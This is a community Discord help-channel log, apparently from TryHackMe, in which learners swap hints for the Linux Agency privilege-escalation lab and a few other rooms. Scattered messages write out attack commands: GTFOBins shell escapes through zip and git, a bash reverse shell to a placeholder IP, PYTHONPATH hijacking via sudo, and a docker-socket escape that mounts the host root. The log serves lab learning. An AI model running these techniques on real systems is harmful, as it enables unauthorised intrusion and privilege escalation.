MAN_NO_LOCALE_WARNING=1
PWD=/home/reza
HOME=/home/reza
SUDO_USER=reza
MAN_ORIG_LESS=
GIT_PREFIX=
SUDO_UID=1033
MAIL=/var/mail/reza
TERM=unknown
SHELL=/bin/bash
MAN_PN=git-config(1)
SUID_UID=1033
PYTHONDONTWRITEBYTECODE=1
SHLVL=2
MANPATH=/usr/share/man:
LESSCHARSET=utf-8
LOGNAME=reza
PATH=/usr/lib/git-core:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
_=/usr/bin/env||

solar needle
#

I donโ€™t know that shop is the missing module because running with Jordan returns the following error only

ripe hedge
#

Do you have a proper shell?

sterile dawn
#

Import tty i guess

blazing thorn
#

/dev/tty

solar needle
#

I usually do the export TERM=xterm

#

And then stty raw -echo;fg

#

But itโ€™s not stabilising this shell

red arch
ripe hedge
#

He got that part

sterile dawn
solar needle
#

And pty.spawn etc

red arch
solar needle
red arch
ripe hedge
#

Some people are listening ;)

solar needle
blazing thorn
#

same

red arch
sterile dawn
#

hey say Im on user3 and my shell dies then I have to start again from user1 bz thats what im doing๐Ÿ˜‚

ripe hedge
#

Yup

#

There's a checkpoint a bit later

red arch
solar needle
ripe hedge
#

The python in the sudo command is the correct one

#

Meow

#

Cats don't go backwards very easily though

solar needle
ripe hedge
#

Yeah cause it's not the command you're allowed to run

solar needle
#

Exactly. But when I run it exactly, it generates an error without the shop module other people are seeing. Hmmm

blazing thorn
#

@solar needle how have you moved from user to user from viktor to this stage? I think we may be doing something incorrect along those lines

thick crescent
#

I'm responding to this a couple weeks late..but as far as I can tell-- you don't actually find the version. I think folks just know what the vulnerability is, and just use the exploit that they know is going to work. I haven't been able to find the version anywhere

ripe hedge
#

Hope you took notes and reset the VM?

blazing thorn
#

yup, have notes ๐Ÿ™‚

stuck fractal
#

@cold oracle When you're logged in it's on the dashboard

solar needle
#

Iโ€™ve been getting the same error for 2 days, and have deployed around 4 times now.

stuck fractal
#

If you're not logged in, you don't see it

ripe hedge
#

Might be how you're getting your shell then

blazing thorn
#

I think that's it

#

I'll start again from VIktor and put notes in spoilers here

thick crescent
stuck fractal
#

technically version numbers can be considered excessive information

solar needle
stuck fractal
#

OWASP recommends against sending any more information than you need because version numbers let attackers search for exploits easily

thick crescent
#

yea i was looking through writeups...lol and nobody mentioned that

ripe hedge
#

Sounds right

thick crescent
#

I mean, they're aren't 45 different exploits, so I figured they just guessed the exploit and the version

solar needle
#

Iโ€™m giving up for the day โ€” will try again tomorrow ๐Ÿ˜ญ

blazing thorn
#

what git route did people take for ||silvio to reza|| ?

ripe hedge
#

Var

blazing thorn
#

which option is that on GTFO?

#

e?

ripe hedge
#

One sec

blazing thorn
#

ty

ripe hedge
#

A

blazing thorn
#

thanks @ripe hedge

#

I am no longer getting the error when running the python script now

#

I was using (b) originally for git

#

very strange... onwards! ๐Ÿ˜„

ripe hedge
#

A was the only one I got working

#

The difference is subtle

verbal flume
#

On linuxagency ||what do you do with roberts ssh key? I got the passphrase but I can't figure out what I'm supposed to do with that info ||

ripe hedge
#

Ssh somewhere I guess?

#

I mean it's an ssh key

white salmon
#

@verbal flume I'm working on the same task, no luck so far

ripe hedge
#

What does one normally do which an ssh key?

verbal flume
#

||SSH into a host, I'm not sure which host I'm supposed to use.||

manic citrus
ripe hedge
#

Try them all

verbal flume
ripe hedge
#

Also look around. I'm told it's possible without a script

manic citrus
ripe hedge
#

||I wrote a port scanner...||

blazing thorn
#

ok, have made it to sean ๐Ÿฅณ

white salmon
#

@manic citrus thanks for the tips

verbal flume
manic citrus
white salmon
verbal flume
manic citrus
#

On the root.txt

manic citrus
sterile dawn
#

@solar needle how /tmp worked for u I tried but same no module name shop

solar needle
manic citrus
solar needle
#

I think my shell is kaput

sterile dawn
solar needle
#

|| are you specifying PYTHONPATH in the CLI when calling the script, or actually updating the PYTHONPATH? And if the latter, wouldnโ€™t that just change the PYTHONPATH for reza, rather than Jordan?||

sterile dawn
#

Export pythonpath=/tmp

manic citrus
verbal flume
#

|| Thanks for all the help, right now when I enter the passphrase follows up with asking for the PW. I've chmodded id_rsa to 400 so it's not that. When I enter the wrong pw it doesn't ask for the password ||

solar needle
manic citrus
verbal flume
manic citrus
blazing thorn
#

ok, got sean flag ๐ŸŽ‰

verbal flume
# manic citrus ||nope||

||I'm logged in as maya at ~ and when I run "ssh -i old_robert_ssh/id_rsa robert@127.0.0.1:2222" I get cannot resolve hostname, when I run "ssh -i old_robert_ssh/id_rsa robert@127.0.0.1 -p 2222" I get asked for robert's pw. I haven't done the other parts of the challenge on this machine, I logged in as agent47 then went straight to maya since I got stuck here last night(just letting you know if that might be where the issue is)||

manic citrus
#

||my bad its -p 2222 not :2222 the password is the passphrase ........ password re-use ||

verbal flume
verbal flume
sterile dawn
#

@manic citrus thanks it worked

#

SETENV perm means i can set environ variable direct from sudo -u ...right?

blazing thorn
#

@verbal flume Mallow as in Mallow in Cork... ?

verbal flume
#

Nope

blazing thorn
#

kk ๐Ÿ™‚

verbal flume
#

Np

manic citrus
sterile dawn
#

@manic citrus got ken as well๐Ÿ˜„

verbal flume
white salmon
manic citrus
blazing thorn
#

any tips for priv esc to penelope?

verbal flume
blazing thorn
#

yup

verbal flume
blazing thorn
#

ah kk

#

ty

manic citrus
solar needle
#

I feel completely exhausted with Linux Agency โ€” the gunshop script is not returning the same error as everyone else is seeing

#

Iโ€™m using AttackBox

blazing thorn
#

haha, has me wrecked ๐Ÿ˜‚

solar needle
#

Iโ€™ve rebooted the machine 5 times now at least.

blazing thorn
#

@solar needle what are the exact priv esc methods you are using? I got some help earlier and I am no longer seeing them

solar needle
#

||Im using TF=$(mktemp -u) zip $TF /etc/hosts -T -TT 'sh #' to get to Dalia. Then Iโ€™m using git help config !/bin/sh to get to Reza||

blazing thorn
#

ok, don't use that git method

#

use (a) for git on GTFO

#

sudo -u USER and then the command from GTFO

#

that's where I was going wrong

#

worked for me then ๐Ÿ™‚

solar needle
#

a has never worked for me

blazing thorn
#

try again

solar needle
#

But if it gives me a shell why should it stop me progressing?

blazing thorn
#

no idea

manic citrus
blazing thorn
#

interesting

#

I used (b) and had issues

#

perhaps it's a red herring

#

but I went with (a) and it's working now

#

have worked through several other users since

solar needle
#

This is what I keep getting, even before continuing

#

|| reza@linuxagency:/home/reza$ sudo -u jordan /opt/scripts/Gun-Shop.py
sudo: unable to open audit system: Permission denied
sudo: pam_open_session: System error
sudo: policy plugin failed session initialization||

blazing thorn
#

that's the exact error I was getting

solar needle
#

When I used a, it kept asking me for a password.

blazing thorn
#

||sudo -u reza PAGER='sh -c "exec sh 0<&1"' git -p help||

solar needle
#

Presumably because it doesnโ€™t start with git

#

Are you using AttackBox?

verbal flume
#

||I used method e||

blazing thorn
#

no

solar needle
#

I wonder whether itโ€™s an AttackBox issue

blazing thorn
#

what is this ||base64|| file for?

verbal flume
#

|| Penelope?||

solar needle
#

But if the net result is a PrivEsc, why should that stop the next step from working ๐Ÿ˜ญ

blazing thorn
blazing thorn
verbal flume
verbal flume
solar needle
#

Itโ€™s exhausting to reset the room so often, and losing progress

blazing thorn
#

that's what I thought

sterile dawn
solar needle
#

It should be a part of the testing process than all rooms are cross checked using the AttackBox too

verbal flume
solar needle
#

Let me reset and try with a

manic citrus
#

Anyone got root.txt yet ?|| wondering if its docker escape, route back from docker over ssh or local privesc as maya||

verbal flume
sterile dawn
#

Any hint on getting maya theres a binary with suid perm,,is it binary exploitation

manic citrus
solar needle
#

And are you all stabilising shells after each PrivEsc?

verbal flume
#

Nope, just straight through

solar needle
#

Aha. So (a) is working now, and I can finally see the ||shop|| error

sterile dawn
#

||Nope I have penelope||

verbal flume
blazing thorn
verbal flume
cold bay
manic citrus
cold bay
white salmon
#

@manic citrus any hint on the user.txt ?

verbal flume
manic citrus
stuck fractal
#

Ironically, DMing without prior permission is against the rules

blazing thorn
manic citrus
verbal flume
#

||check the sudo -l list||

verbal flume
manic citrus
#

It doesn't give the answer but is the method and should be enough info to get there

blazing thorn
stark ridge
#

any hint on sean's flag?

manic citrus
stark ridge
#

@manic citrus thanks bro โค๏ธ

blazing thorn
#

I'm only on THM a short while (60 day streak today since I joined) but this is the wildest room ever ๐Ÿ˜„

#

a serious amount of effort went in to creating it

verbal flume
blazing thorn
verbal flume
blazing thorn
#

ah ok ๐Ÿ™‚

#

you're ahead of me so ๐Ÿ™‚

ripe hedge
#

and a misconfiguration

verbal flume
blazing thorn
#

not got user yet, nevermind root

sterile dawn
#

||Im in docker where do i get this user.txt||

cold bay
manic citrus
manic citrus
cold bay
#

yea i used ||wget from my python server||

#

||set perms||

manic citrus
cold bay
manic citrus
#

||@verbal flume / @cold bay you also need to modify the mount spec inside the config file to mount / instead of /etc from the host ||

sterile dawn
#

||any hint Im in docker Im seeing /bin/bash but no idea||

blazing thorn
blazing thorn
#

is || docker escape|| the only option once I've ||ssh'd as Robert|| ?

manic citrus
# cold bay

Yes, you are connected to the API so now you need to send the requests

ripe hedge
blazing thorn
#

||docker in tmp?||

ripe hedge
#

try it

#

socat looks overly complicated, but I suppose if that wasn't there

zenith owl
#

||I'm stuck in robert, what to do next?||

ripe hedge
#

keep searching

#

there is silliness afoot

blazing thorn
#

I'm out of my depth right now with Docker, will come back to it in the morning

#

it's been fun ๐Ÿ™‚

zenith owl
#

||i found the docker file and sudo -l, have no idea what to do next||

verbal flume
verbal flume
ripe hedge
#

yes you do.

sterile dawn
#

Im trying to escape the docker but curl says could couldn't connect to server

#

Maybe will try socat method

zenith owl
#

||Am i looking for a CVE to get the user.txt?||

manic citrus
halcyon lodge
#

Anyone kind enough to provide a hint for mission25 for Linux Agency?

manic citrus
manic citrus
verbal flume
#

Yea

halcyon lodge
manic citrus
opal vine
#

how can you cover the msg like that

white salmon
manic citrus
trim haven
#

||spoiler||

halcyon lodge
neat cosmos
#

doing the mr.robot room right now and i got a questions about netcat

#

when i run it i get a message saying Listening on 0.0.0.0< port>

#

but for many writeups people have it as listening on app <port>

#

is something wrong with my netcat?

stuck fractal
#

It's just a different version

neat cosmos
#

ohhhh

#

cause i cant seem to get the shell no matter what

restive anchor
#

I'm stuck trying to get jordan's flag in the Linux Agency room. When I run the script as jordan, it says no module named shop

restive anchor
zenith owl
#

||Does the CVE has anything to do with docker.sock?||

manic citrus
zenith owl
manic citrus
white salmon
#

Hi all, tearing my hair out here. Exploiting NFS in Network Services 2, and when I run sudo mount -t nfs 10.10.91.213:/home /tmp/mount -nolock I get the error mount.nfs: access denied by server while mounting 10.10.91.213:/home

#

Please help, wasted the last hour on this with no luck

stuck fractal
#

Are you using a VM?

white salmon
#

No problem, but could you please advise the difference between room-hints and room-help? To the unknowing discord user they both seem like the same thing

#

Yes I'm using a VM

stuck fractal
white salmon
#

I'm running the VPN on the host OS

stuck fractal
stuck fractal
#

Run it in the VM

white salmon
#

Oh ok, thanks

stuck fractal
#

All reverse shells, other services too, things break when you run it on the host and NAT stuff

white salmon
stuck fractal
white salmon
#

Ok so I did a search of "All rooms" for "VPN" and found it, but if I didn't know to search for that I wouldn't have found it. Yep I'll submit the feedback that this room should be linked from https://tryhackme.com/access. Thanks!

proud scarabBOT
white salmon
#

That fixed it, thanks

#

Now I'm trying to do nmap, and I've had this issue with nmap for ages..."sudo nmap -sS -p- 10.10.91.213"...this hangs every time, is there anything wrong with it?

#

Or does it just take a really long time to run?

stuck fractal
#

It's scanning 65000+ ports

#

add -v to see the ports as it finds them

cunning cloud
#

having issue with linux foundations task 10 "su"..lol, I feel like the answer is in the task but its telling me I'm wrong. Nudge please?

cunning cloud
# stuck fractal Specifically?

Well the task tells you to use su to change users without logging out and reconnecting, the q is How do you specify which shell is used when you login?, soudl have sworn it would be su

stuck fractal
#

No

#

It's not

#

It's asking, for su specifically, what flag you use to specify the shell to use

cunning cloud
#

ah ok ty

stuck fractal
#

a shell is a special binary, like bash or sh, that provides your command line and some more features

native talon
#

Linux agency deserves a badge ๐Ÿ˜Š awesome room

zenith owl
#

Awesome indeed, learned a lot.

hollow swan
still fern
#

any hint on root.txt in linux agency?

hollow swan
#

@still fern you cam dm me for hints

sonic wigeon
#

@hollow swan Can I dm you ?

hollow swan
#

@sonic wigeon sure

white salmon
#

@hollow swan can I dm about linuxagency?

hollow swan
#

@white salmon yeah sure

white salmon
candid nimbus
#

By going down the hole. Tell us what you've tried and someone might be able to hint you to the next step.

ripe hedge
#

There's a target

#

You need to deploy the machine

#

Then there's a box that gives the ip address

#

Can't really show you atm, on mobile

candid nimbus
#

So you've deployed the box with the green button? There should be a red bar with 'Active Machine Information' and the target IP below it. Sometimes that doesn't show up and you might just need to refresh or redeploy the box

#

Ah! Pay up ๐Ÿคฃ ๐Ÿคฃ

ripe hedge
#

You might have another VM active somewhere?

#

There's no limit to the number of boxes you can run, but it's one at a time

#

As a free user

#

The attack box is limited though

cursive rover
#

Hey i see that many had the same problem
i'm trying to answer in the room windows event viewer but the answer is wrong (task2) and the number of events increase... anyone can help?

solar needle
#

In Linux Agency, is there a connection between the ssh key cracking from the previous task, to get user.txt? Iโ€™ve ran linpeas.sh, which shows || docker and a container ip of 172.17.0.2 but Iโ€™m getting errors trying to sign in with robert ||

cursive rover
molten bridge
#

can we ask for hints Room: Linux Agency or not yet ?

solar needle
solar needle
molten bridge
#

I've reached Viktor but looking for hints what to do there

solar needle
#

Okay, what have you already tried?

molten bridge
#

Ive found in || ps aux that diala have a shell but what should I do ||

solar needle
#

Have you checked if there are any cronjobs?

molten bridge
#

I wil so

solar needle
#

PS โ€” welcome to the crying corner that is the final part of Linux Agency ๐Ÿ˜‚

molten bridge
solar needle
#

How do you mean? Once you get it on the machine chmod it

molten bridge
molten bridge
solar needle
#

I used AttackBox for this machine. Some advice โ€” whether you stabilise your shells, and or depending on which certain technique you use (will make sense when you do the latter challenges) will depend whether things will work.

#

I spent 2 days stuck on reza, only to realise it was partly a shell stabilisation issue.

molten bridge
#

I did get python shell

#

now for diala

#

but should I run linpase again

solar needle
#

You shouldnโ€™t really need it for the next few challenges.

#

But check the usual things

atomic marten
#

The room.can be talked about now. Right??

marsh saffron
#

Need help with dalia's flag.
I saw the cronjobs but still can't able to figure out what to do next. Can anyone help me.

manic citrus
marsh saffron
manic citrus
#

I took a sledgehammer to it and setup a while true loop with 3s sleep to keep overwriting the file. For the reverse shell I used the bash one from pentest monkeys cheat sheet bash -i >& /dev/tcp/IP-ADDR/PORT 0>&1

marsh saffron
manic citrus
rocky fiber
#

wondering if someone can help me please. I'm using metasploit on "Blue Eternal". I have shell but Ctrl + Z does not work to get out of Windows directory and back to Meterpreter. "bg" or "background" don't work either?

trim haven
#

Does nothing happen or does it error?

rocky fiber
#

it suspends it

rocky fiber
#

rather than going back to Meterpreter

trim haven
#

So CTRL+Z usually backgrounds the process

#

So, if I am not mistaken, it will background the whole of metasploit

rocky fiber
#

yep but when I go back "fg" or "foreground" I just end up back in Windows

trim haven
#

Is this the "move that shell" task?

solar needle
rocky fiber
trim haven
#

One moment, I can't recall the tasks ๐Ÿ˜„

rocky fiber
#

means I can't migrate through the process ID's :/

trim haven
#

Ah I see, I must have been thinking about the other metasploit room

rocky fiber
#

Thanks Jabba ๐Ÿ™‚

trim haven
#

So have you typed bg when the first shell opens?

rocky fiber
#

C:\Windows\system32>bg
bg
'bg' is not recognized as an internal or external command,
operable program or batch file.

trim haven
#

Ah I see the issue

rocky fiber
#

yeah I tried all sorts

trim haven
#

Would you be able to screenshot so I know I am right haha

rocky fiber
#

i'm just stuck in the windows shell

trim haven
#

I believe you missed a step, the screenshot should hopefully tell me

rocky fiber
trim haven
#

So it looks like your shell is already stabilised, if I am not mistaken.

stuck fractal
#

Oh it backgrounded all of msfconsole smh

rocky fiber
stuck fractal
#

It's not meant to do that!

trim haven
#

James are you able to take over, I need to read my notesss

rocky fiber
#

Thank you Jabba, I really appreciate your help.

#

I even watched the video btw to make sure

#

I seem to break things lol

trim haven
#

So are you trying to complete the "escalate" task?

rocky fiber
#

^ yes

trim haven
#

Okay, I did this room a long time ago so to me I am pretty sure the shell is stabilised.

rocky fiber
#

it does seem to be

trim haven
#

If you seen on the previous task

stuck fractal
#

Jabba, it's a stable shell

#

It's not a meterpreter

trim haven
#

In the top screenshot it is meterpreter, no?